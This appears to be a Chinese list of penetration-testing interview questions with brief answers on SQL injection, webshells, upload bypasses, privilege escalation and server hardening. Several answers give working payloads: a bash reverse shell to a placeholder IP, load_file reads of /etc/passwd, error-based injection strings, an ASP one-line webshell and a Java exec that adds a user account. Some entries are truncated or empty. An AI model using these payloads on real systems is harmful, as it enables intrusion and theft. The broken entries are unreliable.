1.拿到一个待检测的站,你觉得应该先做什么?收集信息:whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息、敏感目录文件、后台地址,cms识别、漏洞信息收集
2.mysql的网站注入,5.0以上和5.0以下有什么区别?5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名;
5.0以下是多用户单操作,5.0以上是多用户多操做。
4.判断出(识别)网站的CMS对渗透有什么意义?查找网上已曝光的程序漏洞,如果开源,还能下载相对应的源码进行代码审计。
5.一个成熟并且相对安全的CMS,渗透时扫目录的意义?(1)敏感文件、二级目录扫描(2)站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点
6.常见的网站服务器容器IIS、Apache、nginx、Tomcat,weblogic、jboss
7.mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?root权限以及网站的绝对路径、load_file()读取文件操作前提:知道文件的绝对路径能够使用union查询对web目录有写的权限unionselect1,load_file('/etc/passwd'),3,4,5#0x2f6574632f706173737764unionselect1,load_file(0x2f6574632f706173737764),3,4,5#路径没有加单引号的话必须转换十六进制要是想省略单引号的话必须转换十六进制intooutfile写入文件操作前提:文件名必须是全路径(绝对路径)用户必须有写文件的权限没有对单引号'过滤select'
9.如何手工快速判断目标站是windows还是linux服务器?linux大小写敏感,windows大小写不敏感
10.为何一个mysql数据库的站,只有一个80端口开放?(1)更改了端口,没有扫描出来(2)站库分离(3)3306端口不对外开放
11.3389无法连接的几种情况(1)没开放3389端口(2)端口被修改(3)防护拦截(4)处于内网(需进行端口转发)
12.如何突破注入时字符被转义?宽字符注入;hex编码绕过
13.在某后台新闻编辑界面看到编辑器,应该先做什么?查看编辑器的名称版本,然后搜索公开的漏洞
14.拿到一个webshell发现网站根目录下有.htaccess文件,我们能做什么?
能做的事情很多,用隐藏网马来举例子:
15.注入漏洞只能查账号密码?可脱裤,可上传webshell,可执行命令
16.安全狗会追踪变量,从而发现出是一句话木马吗?是根据特征码,所以很好绕过
17.access扫出后缀为asp的数据库文件,访问乱码。如何实现到本地利用迅雷下载,直接改后缀为.mdb
18.提权时选择可读写目录,为何尽量不用带空格的目录?因为exp执行多半需要空格界定参数
19.某服务器有站点A,B为何在A的后台添加test用户,访问B的后台。发现也添加上了test用户?同数据库
20.注入时可以不使用and或or或xor,直接orderby开始注入吗?and/or/xor,前面的1=1、1=2步骤只是为了判断是否为注入点,如果已经确定是注入点那就可以省去那步骤。
22.上传大马后访问乱码时,有哪些解决办法?浏览器中改编码
23.审查上传点的元素有什么意义?有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了
24.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?先爆破用户名,再利用被爆破出来的用户名爆破密码。
26.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和admin目录。请问你的想法是?直接在网站二级目录/abc/下扫描敏感文件及目录
28.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?审查元素把密码处的password属性改成text就明文显示了
29.目标站无防护,上传图片可以正常访问,上传脚本格式访问则403.什么原因?原因很多,有可能web服务器配置把上传目录写死了不执行相应脚本,尝试改后缀名绕过
30.审查元素得知网站所使用的防护软件,你觉得怎样做到的?
在敏感操作被拦截,通过界面信息无法具体判断是什么防护的时候,F12看HTML体部比如护卫神就可以在名称那看到内容
31.在win2003服务器中建立一个.zhongzi文件夹用意何为?隐藏文件夹,为了不让管理员发现你传上去的工具
32.sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由A.demo.jspid=2+1B.demo.jspid=2-1选B,在URL编码中+代表空格,可能会造成混淆
33.以下链接存在sql注入漏洞,对于这个变形注入,你有什么思路?demo.doDATA=AjAxNg==DATA有可能经过了base64编码再传入服务器,所以我们也要对参数进行base64编码才能正确完成测试
36.CSRF、SSRF和重放攻击有什么区别?(1)CSRF是跨站请求伪造攻击,由客户端发起(2)SSRF是服务器端请求伪造,由服务器发起(3)重放攻击是将截获的数据包进行重放,达到身份认证等目的
37.说出至少三种业务逻辑漏洞,以及修复方式?(1)密码找回漏洞中存在密码允许暴力破解、存在通用型找回凭证、可以跳过验证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码(2)身份认证漏洞中最常见的是会话固定攻击和Cookie仿冒,只要得到Session或Cookie即可伪造用户身份(3)验证码漏洞中存在验证码允许暴力破解、验证码可以通过Javascript或者改包的方法来进行绕过
44.sqlmap,怎么对一个注入点注入?(1)如果是get型号,直接,sqlmap-u"诸如点网址".(2)如果是post型诸如点,可以sqlmap-u"注入点网址”--data="post的参数"(3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap-r"文件地址"
46.sql注入的几种类型?(1)报错注入(2)bool型注入(3)延时注入(4)宽字节注入
47.报错注入的函数有哪些?(1)andextractvalue(1,concat(0x7e,(select@@version),0x7e))】】】----------------(2)通过floor报错向下取整(3)+andupdatexml(1,concat(0x7e,(secect@@version),0x7e),1)4)geometrycollection()selectfromtestwhereid=1andgeometrycollection((selectfrom(selectfrom(selectuser())a)b));(5)multipoint()selectfromtestwhereid=1andmultipoint((selectfrom(selectfrom(selectuser())a)b));(6)polygon()selectfromtestwhereid=1andpolygon((selectfrom(selectfrom(selectuser())a)b));(7)multipolygon()selectfromtestwhereid=1andmultipolygon((selectfrom(selectfrom(selectuser())a)b));(8)linestring()selectfromtestwhereid=1andlinestring((selectfrom(selectfrom(selectuser())a)b));(9)multilinestring()selectfromtestwhereid=1andmultilinestring((selectfrom(selectfrom(selectuser())a)b));(10)exp()selectfromtestwhereid=1andexp(~(select*from(selectuser())a));addslashes()函数返回在预定义字符之前添加反斜杠的字符串
48.延时注入如何来判断?(1)if(ascii(substr(“hello”,1,1))=104(2)sleep(5),1)
49.盲注和延时注入的共同点?都是一个字符一个字符的判断
50.如何拿一个网站的webshell?上传,后台编辑模板,sql注入写文件,命令执行,代码执行,一些已经爆出的cms漏洞,比如dedecms后台可以直接建立脚本文件,wordpress上传插件包含脚本文件zip压缩包等
51.sql注入写文件都有哪些函数?(1)select'一句话'intooutfile'路径'(2)select'一句话'intodumpfile'路径'(3)select'
52.如何防止CSRF(1)验证referer(2)验证token
53.owasptop10漏洞都有哪些?(1)SQL注入防护方法:(2)失效的身份认证和会话管理(3)跨站脚本攻击XSS(4)直接引用不安全的对象(5)安全配置错误(6)敏感信息泄露(7)缺少功能级的访问控制(8)跨站请求伪造CSRF(9)使用含有已知漏洞的组件(10)未验证的重定向和转发
55.代码执行,文件读取,命令执行的函数都有哪些?(1)代码执行:eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function(2)文件读取:file_get_contents(),highlight_file(),fopen(),readfile(),fread(),fgetss(),fgets(),parse_ini_file(),show_source(),file()等(3)命令执行:system(),exec(),shell_exec(),passthru(),pcntl_exec(),popen(),proc_open()
56.img标签除了onerror属性外,还有其他获取管理员路径的办法吗?src指定一个远程的脚本文件,获取referer
58.怎么绕过WAF注入和上传以及xss?(1)关键字可以用%(只限IIS系列),比如select可以sel%e%ct。
59.既然宽字节注入可以绕过单引号过滤,那么怎么来修复呢?宽字符:解决方法:就是在初始化连接和字符集之后,使用SETcharacter_set_client=binary来设定客户端的字符集是二进制的。修改Windows下的MySQL配置文件一般是my.ini,Linux下的MySQL配置文件一般是my.cnf,比如:mysql_query("SETcharacter_set_client=binary");。character_set_client指定的是SQL语句的编码,如果设置为binary,MySQL就以二进制来执行,这样宽字节编码问题就没有用武之地了。
60.列举出oracle注入获取管理员权限提权典型漏洞?【漏洞名称】sys.dbms_export_extension.get_domain_index_metadata提升权限漏洞【影响平台】Oracle8i/9i/10g/XE【风险等级】高【攻击需求】较低权限账号【造成危害】取得管理员权限
62、mssql提权提示错误代码5,cmd权限不足的原因?由于xp_cmdshell是严格用%systemroot%\system32\cmd.exe去执行所提交的命令的,提示”5″,意思是cmd的权限不足,就是说system32下的cmd.exe被降权了。当然也有绕过的方法,比如启用沙盒模式执行shell命令。
63.怎么用sqlmap对sa权限的mssql2008进行提权?(1)第一种函数selectnamefromsysobjectswherextype=u通过这个来爆第一个表selectnamefromsysobjectswherextype=uandnamenotin(爆出来的表1,爆出来的表2...)一直爆下去,直到找到我们所需要的表位置(2)第二种函数selecttable_namefrominformation_schema.tablesselecttable_namefrominformation_schema.tableswheretable_namenotin(爆出来的表1,爆出来的表2...)
65.gpc魔术引号?
67.什么叫ssrf以及ssrf的防御?(1)SSRF(Server-SideRequestForgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统(2)SSRF统一错误信息,避免用户可以根据错误信息来判断远程服务器端口状态1.限制请求的端口为HTTP常用的端口,比如80,443,8080,8088等2.黑名单内网IP。3.禁用不需要的协议,仅仅允许HTTP和HTTPS
68.如何利用php的远程命令执行函数进行反弹ncsystem,exec,shell_exec,paassthru,popen,proc_popen,反弹shell公网服务器执行nc–lvv8888目标服务器上执行cmd=bash-i>&/dev/tcp/10.0.0.1/88880>&1并在disabl_functions中禁用
69.文件包含漏洞可以用来做啥,以及需要主要注意的事项?(1)配合文件上传漏洞GetShell,可以执行任意脚本代码,网站源码文件以及配置文件泄露,远程包含GetShel,控制整个网站甚至是服务器(2)allow_url_fopen和allow_url_include为ON的话,则包含的文件可以是第三方服务器中的文件,这样就形成了远程文件包含漏洞(3)/etc/passwd需要magic_quotes_gpc=off,PHP小于5.3.4有效(4)/etc/passwd././././././././././././.[......]/././././././././.(5)php版本小于5.2.8可以成功,linux需要文件名长于4096,windows需要长于256。index.phppage=php://filter/read/=convert.base64-encode/resource=index.php
70.文件上传有哪些技巧?
通过抓包截断将eval.php.jpg换成eval.php_jpg(下划线为0x00)。在上传文件时系统文件遇到0x00。会认为文件已经结束。从而将eval.php.jpg的内容写入到eval.php中。
2.0-2.2IIS7.5解析漏洞,任意文件名后加.php
nginx<0.8.321.jpg/1.php
nginx>0.8.41<1.5.6,1.jpg%20.php解析
**SQL注入(SqlInjection)是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行
71.HTTP协议head方法的功能与get方法不同之处是?不同之处在于服务器不会在其相应中返回消息主体。TRACE。这种方法主要用于诊断。OPTIONS。这种方法要求服务器报告对某一特殊资源有效的HTTP方法。PUT。这个方法试图使用包含在请求主体中的内容,向服务器上传制定的资源**各种注释#-------+///**/空白字符,+号,-号,~号,!号,@形式{}%0a-----------------------------
73.对称加密非对称加密?对称加密:加解密用同一密钥,密钥维护复杂n(n-1)/2,不适合互联网传输密钥,加解密效率高。应用于加密数据。非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就可以,适合于互联网传输公钥,但是加密效率低,应用于数字签名及加密。
75.cookie存在哪里?可以打开吗C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到cookies文件夹。
76.xss如何盗取cookie?
攻击者代码:
脚本端:
77.tcp、udp的区别及tcp三次握手,syn攻击?
78.证书要考哪些?信息安全国际第一认证——CISSP信息安全国内认证——CISAW信息安全国内认证——CISP信息安全技术实操认证新贵——Security+IT审计人员的必备之证——CISA=
81.IIS服务器应该做哪些方面的保护措施?1.保持Windows升级:2.使用IIS防范工具3.移除缺省的Web站点4.如果你并不需要FTP和SMTP服务,请卸载它们5.有规则地检查你的管理员组和服务:6.严格控制服务器的写访问权限7.设置复杂的密码8.减少/排除Web服务器上的共享9.禁用TCP/IP协议中的NetBIOS:10.使用TCP端口阻塞11.仔细检查*.bat和*.exe文件:每周搜索一次*.bat12.管理IIS目录安全:13.使用NTFS安全:14.管理用户账户15.审计你的Web服务器:
84.虚拟机的几种连接方式及原理?安装完虚拟机后,默认安装了两个虚拟网卡,VMnet1和VMnet8,其他的未安装(当然也可以手动安装其他的)。其中VMnet1是host网卡,用于host方式连接网络的。VMnet8是NAT网卡,用于NAT方式连接网络的。它们的IP地址是随机生成的,如果要用虚拟机做实验的话,最好将VMnet1到VMnet8的IP地址改掉。习惯上把VMware虚拟网卡使用的网段"固定",使用如下原则:VMnet1对应的网段是192.168.10.0,VMnet2对应的网段是192.168.20.0,其他的类似。当然平常只是随便用用的就不用改了,能上网就行了。VMware网络连接的方式主要有:桥接(Bridged)、NAT、主机网络(Host-Only)。1.Usebridgednetworking(使用桥接网络)说明:使用VMnet0虚拟交换机,此时虚拟机相当与网络上的一台独立计算机与主机一样,拥有一个独立的IP地址,其网络拓扑如图1所示,使用桥接方式,A,A1,A2,B可互访。
2.Usenetworkaddresstranslation(NAT)说明:使用Vmnet8虚拟交换机,此时虚拟机可以通过主机单向网络上的其他工作站,其他工作站不能访问虚拟机。其网络拓扑如图2所示,使用NAT方式,A1,A2可以访问B,但B不可以访问A1,A2。但A,A1,A2可以互访。
3.UseHost-Onlynetworking(使用主机网络)说明:使用Vmnet1虚拟交换机,此时虚拟机只能与虚拟机、主机互访。也就是不能上Internet,其网络拓扑如图3所示,使用Host方式,A,A1,A2可以互访,但A1,A2不能访问B,也不能被B访问。
86.SSLStrip(SSp)攻击到底是什么?SSL协议(SecureSocketLayer,安全套接层)主要是使用公开密钥体制和X.509数字证书技术保护信息传输的机密性和完整性,它不能保证信息的不可抵赖性,主要适用于点对点之间的信息传输,常用WebServer方式。
88.会话劫持原理在现实生活中,比如你去市场买菜,在交完钱后你要求先去干一些别的事情,稍候再来拿菜;如果这个时候某个陌生人要求把菜拿走,卖菜的人会把菜给陌生人吗?!当然,这只是一个比喻,但这恰恰就是会话劫持的喻意。所谓会话,就是两台主机之间的一次通讯。例如你Telnet到某台主机,这就是一次Telnet会话;你浏览某个网站,这就是一次HTTP会话。而会话劫持(SessionHijack),就是结合了嗅探以及欺骗技术在内的攻击手段。例如,在一次正常的会话过程当中,攻击者作为第三方参与到其中,他可以在正常数据包中插入恶意数据,也可以在双方的会话当中进行简听,甚至可以是代替某一方主机接管会话。我们可以把会话劫持攻击分为两种类型:
1)中间人攻击(ManInTheMiddle,简称MITM),2)注射式攻击(Injection);并且还可以把会话劫持攻击分为两种形式:
1)被动劫持:被动劫持实际上就是在后台监视双方会话的数据流,丛中获得敏感数据;
2)主动劫持:主动劫持则是将会话当中的某一台主机“踢”下线,然后由攻击者取代并接管会话,这种攻击方法危害非常大,攻击者可以做很多事情,比如“catetc/master.passwd”(FreeBSD下的Shadow文件)。
90.注射式攻击简介?这种方式的会话劫持比中间人攻击实现起来简单一些,它不会改变会话双方的通讯流,而是在双方正常的通讯流插入恶意数据。在注射式攻击中,需要实现两种技术:1)IP欺骗,2)预测TCP序列号。如果是UDP协议,只需伪造IP地址,然后发送过去就可以了,因为UDP没有所谓的TCP三次握手,但基于UDP的应用协议有流控机制,所以也要做一些额外的工作。对于IP欺骗,有两种情况需要用到:1)隐藏自己的IP地址;2)利用两台机器之间的信任关系实施入侵。在Unix/Linux平台上,可以直接使用Socket构造IP包,在IP头中填上虚假的IP地址,但需要root权限;在Windows平台上,不能使用Winsock,需要使用Winpacp(也可以使用Libnet)。例如在Linux系统,首先打开一个RawSocket(原始套接字),然后自己编写IP头及其他数据。
105.Web服务器被入侵后,怎样进行排查?1.查看下web服务器日志,
2.看看有没有异常端口开放,
3.使用安全狗等服务器安全软件清扫。
(2)如何防止DLL劫持DLL劫持利用系统未知DLL的搜索路径方式,使得程序加载当前目录下的系统同名DLL。所以可以告诉系统DLL的位置,改变加载系统DLL的顺序不是当前目录,而是直接到系统目录下查找
107.什么叫0day漏洞?是已经发现但是官方还没发布补丁的漏洞。
109.蜜罐是什么?蜜罐好比是情报收集系统。蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击。所以攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。
111.DDOS的定义?
112.震网病毒的定义?指一种蠕虫病毒,是第一个专门定向攻击真实世界中基础(能源)设施的“蠕虫”病毒,比如核电站,水坝,国家电网。只要电脑操作员将被病毒感染的U盘插入USB接口,这种病毒就会在神不知鬼不觉的情况下(不会有任何其他操作要求或者提示出现)取得一些工业用电脑系统的控制权。与传统的电脑病毒相比,“震网”病毒不会通过窃取个人隐私信息牟利。无需借助网络连接进行传播。这种病毒可以破坏世界各国的化工、发电和电力传输企业所使用的核心生产控制电脑软件,并且代替其对工厂其他电脑“发号施令”。极具毒性和破坏力。“震网”代码非常精密,主要有两个功能,一是使伊朗的离心机运行失控,二是掩盖发生故障的情况,“谎报军情”,以“正常运转”记录回传给管理部门,造成决策的误判。
113.常用的一句话木马?asp一句话木马:<%execute(request("value"))%>php一句话木马:
117.TCP和UDP的区别?TCP协议和UDP协议特性区别总结:1.TCP协议在传送数据段的时候要给段标号;UDP协议不2.TCP协议可靠;UDP协议不可靠3.TCP协议是面向连接;UDP协议采用无连接4.TCP协议负载较高,采用虚电路;UDP采用无连接5.TCP协议的发送方要确认接收方是否收到数据段(3次握手协议)6.TCP协议采用窗口技术和流控制
121.什么是手机”越狱“?所谓iOS系统的越狱就是取得系统最高权限的行为,越狱前后iOS系统本身并不会发生质的改变,只是越狱后可以对iOS系统进行更充分的利用而已。越狱的好处:1、越狱之后操作性更强,取得了手机的最高权限,就可以修改手机内容,包括安装免费的破解软件、自定义功能、美化等等。2、越狱后可以绕过AppStore免费下载APP。越狱的坏处:1、越狱后失去保修。2、越狱之后,后台程序运行,桌面主题等都会加大耗电。3、越狱就是打破iOS系统封闭,所以手机就相对变得不安全了。
124.内网穿透即NAT穿透,采用端口映射,让外网的电脑找到处于内网的电脑,同时也可基于HTTP/2实现web内网穿透。
139.如果叫你来防御蠕虫,你有哪些方法?对输入(和URL参数)进行过滤,对输出进行编码。
140.如果给你一个XSS盲打漏洞,但是返回来的信息显示,他的后台是在内网,并且只能使用内网访问,那么你怎么利用这个XSS?必须是selfxss+csrf+ssrf到getshel。
141.php的LFI,本地包含漏洞原理是什么?写一段带有漏洞的代码。如果允许客户端用户输入控制动态包含在服务器端的文件,会导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含和远程文件包含两种形式。常见包含函数有:include()、require()区别:include是当代码执行到它的时候才加载文件,发生错误的时候只是给一个警告,然后继续往下执行require是只要程序一执行就会立即调用文件,发生错误的时候会输出错误信息,并且终止脚本的运行
142.CSRF漏洞的本质是什么?本质就是xss
143.你都了解哪些java框架?spring和struts2框架
144.ibats的参数化查询能不能有效的控制sql注入?有没有危险的方法可以造成sql注入?SQL注入主要的是因为文本框的内容和SQL连接以后会改变SQL的语义,例如文本框包含单引号什么的。参数化查询就可以将这些内容独立作为参数,本身的语句不会改变。
处理时最终的结果就是java.lang.Runtime.getRuntime().exit(1);//关闭程序,即将web程序关闭类似的可以执行java.lang.Runtime.getRuntime().exec("netuser用户名密码/add");//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/)只要有权限就可以执行任何DOS命令
146.ongl在这个payload中起了什么作用?Ognl表达式语言,Struts标签默认支持的表达式语言,必须配置Struts标签用,不能离开Struts标签直接使用,就是说Ognl必须在Struts中使用
147.\u0023是什么字符的16进制编码?为什么在payload中要用他?#,在S2-005中可通过\u0023绕过过滤执行
148.xssfilter在java程序的哪里设置?在web.xml里面配置
149.说下java的类反射在安全上可能存在哪些问题?可能会导致JAVA反序化漏洞
150.tomcat要做哪些安全加固?升级到最新稳定版从监听端口上加固仅在本地监听如果Tomcat不需要对外提供服务,则监听在本地回环,前面放Nginx。如果需要对外提供访问,比如一个Nginx挂多个Tomcat,那么在服务器上用iptables只允许负载均衡器的IP来访问关闭8009端口现在我们一般不用Apache通过AJP协议来调用Tomcat了,所以AJP端口可以关闭。8005端口查看端口占用情况自定义错误页面,隐藏Tomcat信息编辑conf/web.xml,在标签上添加以下内容:禁用Tomcat管理页面删除webapps目录下Tomcat原有的所有内容删除conf/Catalina/localhost/下的host-manager.xml和manager.xml这两个文件用普通用户启动Tomcat禁止Tomcat列目录如果tomcat重启的话,webapps下,你删除的后台会不会又回来?你只是删除了后台,并没有删除webaspps下war包
151.mysql数据库默认有哪些库?说出库的名字?1.mysql库,存储用户等信息2.information_schema,存储表、锁等性能信息3.test,mysql自建测试库4.performance_schema,互斥锁等信息(5.6之前需要手动开启,从5.6开始默认开启)
152.mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式?mysql.user表MySQL4.1版本之前是MySQL323加密,MySQL4.1和之后的版本都是MySQLSHA1加密MYSQL323加密中生成的是16位字符串,而在MySQLSHA1中生存的是41位字符串,其中*是不加入实际的密码运算中,通过观察在很多用户中都携带了"*",在实际破解过程中去掉"*",也就是说MySQLSHA1加密的密码的实际位数是40位
153.mysql表权限里面,除了增删改查,文件读写,还有哪些权限?排序,查询,索引等
156.简述Linux系统安全加固需要做哪些方面?1.密码安全策略2.关闭不必要的端口和服务3.文件权限的设置等
157.你使用什么工具来判断系统是否存在后门?pchunter攻击查看进程和服务
160.Linux的Selinux是什么?如何设置Selinux?SELinux是一种安全子系统,它能控制程序只能访问特定文件使用setup工具进入图形化关闭搜索或者修改/etc/sysconfig/selinux文件SELINUX=disabled防火墙打开使用serviceiptablesstart或则/etc/init.d/iptablesstart
161.iptables工作在TCP/IP模型中的哪层?网络层
163.syslog可不可以使用vi等工具直接查看?是二进制文件吗?不能,只能使用cat之类的命令攻击查看,属于二进制文件
164.DNS在渗透中的作用?通过DNS可以查询对应的IP主机名,也可以查询出是否存在域传输漏洞